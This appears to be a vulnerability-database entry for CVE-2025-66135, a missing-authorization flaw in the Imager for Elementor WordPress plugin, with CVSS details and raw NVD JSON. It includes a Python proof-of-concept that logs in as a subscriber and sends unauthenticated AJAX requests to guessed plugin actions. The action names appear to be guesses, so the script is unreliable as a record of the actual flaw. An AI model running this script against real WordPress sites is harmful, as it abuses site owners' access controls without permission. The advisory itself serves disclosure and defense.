Security Vulnerability Report
中文
CVE-2025-66135 CVSS 5.4 MEDIUM

CVE-2025-66135

Published: 2026-01-22 17:16:00
Last Modified: 2026-04-27 18:16:37

Description

Missing Authorization vulnerability in merkulove Imager for Elementor imager-elementor allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Imager for Elementor: from n/a through <= 2.0.4.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Imager for Elementor <= 2.0.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-66135 PoC - Imager for Elementor Missing Authorization # This PoC demonstrates the broken access control vulnerability target_url = sys.argv[1] if len(sys.argv) > 1 else "http://target-site.com" # WordPress login to get valid nonce and auth cookies login_url = f"{target_url}/wp-login.php" ajax_url = f"{target_url}/wp-admin/admin-ajax.php" # Step 1: Login as low-privilege user (subscriber role) login_data = { "log": "attacker_username", "pwd": "attacker_password", "wp-submit": "Log In", "redirect_to": "/wp-admin/", "testcookie": "1" } session = requests.Session() login_response = session.post(login_url, data=login_data) if "wordpress_logged_in" not in str(session.cookies): print("[-] Login failed") exit(1) print("[+] Login successful as low-privilege user") # Step 2: Identify vulnerable endpoint # The plugin's AJAX handlers lack proper capability checks vulnerable_actions = [ "imager_elementor_upload", "imager_elementor_process", "imager_elementor_save_settings", "imager_elementor_delete_image" ] # Step 3: Exploit the missing authorization for action in vulnerable_actions: exploit_data = { "action": action, "nonce": "", # May not be required due to missing auth check "post_id": "1" } response = session.post(ajax_url, data=exploit_data) # Check if the request was processed (indicating missing auth) if response.status_code == 200 and "error" not in response.text.lower(): print(f"[+] Vulnerable endpoint found: {action}") print(f"[+] Response: {response.text[:200]}") else: print(f"[-] Endpoint {action} appears protected") print("\n[*] Note: This PoC checks for missing authorization checks.") print("[*] Modify the exploit_data payload based on actual vulnerable function.")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-66135", "sourceIdentifier": "[email protected]", "published": "2026-01-22T17:16:00.343", "lastModified": "2026-04-27T18:16:37.493", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in merkulove Imager for Elementor imager-elementor allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Imager for Elementor: from n/a through <= 2.0.4."}, {"lang": "es", "value": "Vulnerabilidad de falta de autorización en merkulove Imager para Elementor imager-elementor permite explotar niveles de seguridad de control de acceso mal configurados. Este problema afecta a Imager para Elementor: desde n/a hasta &lt;= 2.0.4."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/imager-elementor/vulnerability/wordpress-imager-for-elementor-plugin-2-0-4-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}